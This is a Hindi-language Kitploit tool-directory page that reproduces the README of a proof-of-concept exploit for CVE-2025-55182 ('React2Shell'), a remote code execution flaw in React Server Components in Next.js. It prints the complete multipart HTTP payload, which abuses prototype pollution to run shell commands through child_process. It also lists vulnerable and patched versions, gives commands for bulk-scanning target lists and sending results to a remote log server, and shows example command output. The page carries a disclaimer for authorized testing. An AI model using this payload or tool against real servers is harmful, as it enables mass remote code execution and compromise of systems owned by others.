Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
React2Shell-Exploit-CVE-2025-55182 — React2Shell CVE-2025-55182 के लिए एक proof-of-concept एक्सप्लॉइट है जो Next.js में संवेदनशील React Server Components (RSC) कार्यान्वयनों को प्रभावित करता है। | Kitploit
उपकरण/GitHubGitHub/indra-031/react2shell-exploit-cve-2025-55182
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubindra-031/react2shell-exploit-cve-2025-55182

React2Shell-Exploit-CVE-2025-55182

React2Shell CVE-2025-55182 के लिए एक proof-of-concept एक्सप्लॉइट है जो Next.js में संवेदनशील React Server Components (RSC) कार्यान्वयनों को प्रभावित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
127 दिन पहलेअभी तक समीक्षित नहीं

💀 React2Shell एक्सप्लॉइट — CVE-2025-55182

root@kitploit:~
██████╗ ███████╗ █████╗  ██████╗████████╗██████╗ ███████╗██╗  ██╗███████╗██╗     ██╗
██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝╚════██╗██╔════╝██║  ██║██╔════╝██║     ██║
██████╔╝█████╗  ███████║██║        ██║    █████╔╝███████╗███████║█████╗  ██║     ██║
██╔══██╗██╔══╝  ██╔══██║██║        ██║   ██╔═══╝ ╚════██║██╔══██║██╔══╝  ██║     ██║
██║  ██║███████╗██║  ██║╚██████╗   ██║   ███████╗███████║██║  ██║███████╗███████╗███████╗
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝

🔥 React Server Components रिमोट कोड एक्ज़ीक्यूशन

CVE-2025-55182

INDRA द्वारा लिखित


⚠️ अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान और अधिकृत पेनिट्रेशन परीक्षण के लिए प्रदान किया गया है।

लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी नहीं लेता है।

इस एक्सप्लॉइट का उपयोग केवल उन्हीं सिस्टम के विरुद्ध करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है।


📖 विवरण

React2Shell CVE-2025-55182 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो Next.js में मौजूद कमजोर React Server Components (RSC) इम्प्लीमेंटेशन को प्रभावित करता है।

यह एक्सप्लॉइट एक क्राफ्टेड मल्टीपार्ट रिक्वेस्ट भेजता है जो कमजोर डिसीरियलाइज़ेशन फ्लो का दुरुपयोग करता है और एप्लिकेशन के रीडायरेक्ट डाइजेस्ट रिस्पॉन्स के माध्यम से कमांड आउटपुट निकालता है।

सफल होने पर, एक्सप्लॉइट निष्पादित कमांड का आउटपुट सीधे टर्मिनल में प्रदर्शित करता है।


✨ विशेषताएँ

  • 🚀 सिंगल टारगेट मोड
  • 🌍 बल्क स्कैन मोड
  • 🔄 स्वचालित HTTP और HTTPS पहचान
  • ⚡ मल्टी-थ्रेडेड निष्पादन
  • 📝 वैकल्पिक लोकल लॉगिंग
  • 🌐 वैकल्पिक रिमोट लॉग सर्वर
  • 🎯 साफ-सुथरा आउटपुट
  • 🛡 SSL सत्यापन अक्षम (परीक्षण वातावरण के लिए)
  • 📂 डुप्लिकेट टारगेट हटाना

📦 आवश्यकताएँ

Python 3.8+

निर्भरताएँ इंस्टॉल करें:

root@kitploit:~
pip install requests urllib3

📁 प्रोजेक्ट संरचना

root@kitploit:~
.
├── exploit.py
└── README.md

🔥 कमजोर वर्ज़न

React


Next.js

कमजोर

  • 14.3.0-canary.77 और उसके बाद के वर्ज़न
  • 15.x
  • 16.x

पैच किया गया

  • 15.0.5
  • 15.1.9
  • 15.2.6
  • 16.0.7

📨 उपयोग किया गया HTTP रिक्वेस्ट

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]

------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

🚀 उपयोग

मदद देखें

root@kitploit:~
python exploit.py -h

एक टारगेट स्कैन करें

root@kitploit:~
python exploit.py -u https://target.com

कई टारगेट स्कैन करें

targets.txt

root@kitploit:~
target1.com
target2.com
target3.com

चलाएँ

root@kitploit:~
python exploit.py -f targets.txt

परिणाम सहेजें

root@kitploit:~
python exploit.py -u https://target.com -o results.txt

परिणाम रिमोट लॉग सर्वर पर भेजें

root@kitploit:~
python exploit.py -u https://target.com -l https://your-log-server.com

सब कुछ एक साथ

root@kitploit:~
python exploit.py -f targets.txt -o results.txt -l https://your-log-server.com

📋 कमांड लाइन विकल्प


🖥 उदाहरण आउटपुट

root@kitploit:~
🚀 Loaded 42 targets (HTTP + HTTPS)

🔥 [VULNERABLE] https://target.com/

💀 Command Output →
uid=1000(node) gid=1000(node) groups=1000(node)

──────────────────────────────────────────────

⚙️ यह कैसे काम करता है

  1. टारगेट पढ़ता है
  2. स्वचालित रूप से HTTP और HTTPS URL जनरेट करता है
  3. क्राफ्टेड मल्टीपार्ट रिक्वेस्ट भेजता है
  4. रीडायरेक्ट डाइजेस्ट को पार्स करता है
  5. कमांड आउटपुट निकालता है
  6. सफल एक्सप्लॉइटेशन प्रिंट करता है
  7. वैकल्पिक रूप से परिणामों को लोकल या रिमोट रूप से संग्रहीत करता है

📌 नोट्स

  • जब कोई स्कीम प्रदान नहीं की जाती है, तो स्वचालित रूप से HTTP और HTTPS दोनों का परीक्षण करता है।
  • डुप्लिकेट टारगेट स्वचालित रूप से हटा दिए जाते हैं।
  • 30 समवर्ती थ्रेड का उपयोग करता है।
  • अमान्य SSL सर्टिफिकेट को अनदेखा करता है।
  • टाइमआउट 10 सेकंड पर सेट है।

❤️ क्रेडिट्स

  • एक्सप्लॉइट डेवलपमेंट: INDRA
  • CVE: CVE-2025-55182

⚖️ कानूनी नोटिस

अनुमति के बिना सिस्टम के विरुद्ध इस सॉफ़्टवेयर का अनधिकृत उपयोग स्थानीय, राष्ट्रीय या अंतरराष्ट्रीय कानूनों का उल्लंघन कर सकता है।

लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है।


⭐ अगर इस प्रोजेक्ट ने आपके शोध में मदद की है, तो इसे एक स्टार देने पर विचार करें।

शुभ शिकार 🕷️

टूल डाउनलोड करें
वर्ज़नस्थिति
19.0⚠ कमजोर
19.1.0⚠ कमजोर
19.1.1⚠ कमजोर
19.2.0⚠ कमजोर
19.0.1✅ पैच किया गया
19.1.2✅ पैच किया गया
19.2.1✅ पैच किया गया
विकल्पविवरण
-uटारगेट URL
-fटारगेट डोमेन वाली फ़ाइल
-oकमजोर टारगेट्स को लोकल रूप से सहेजें
-lपरिणाम रिमोट लॉग सर्वर पर भेजें
-hमदद दिखाएँ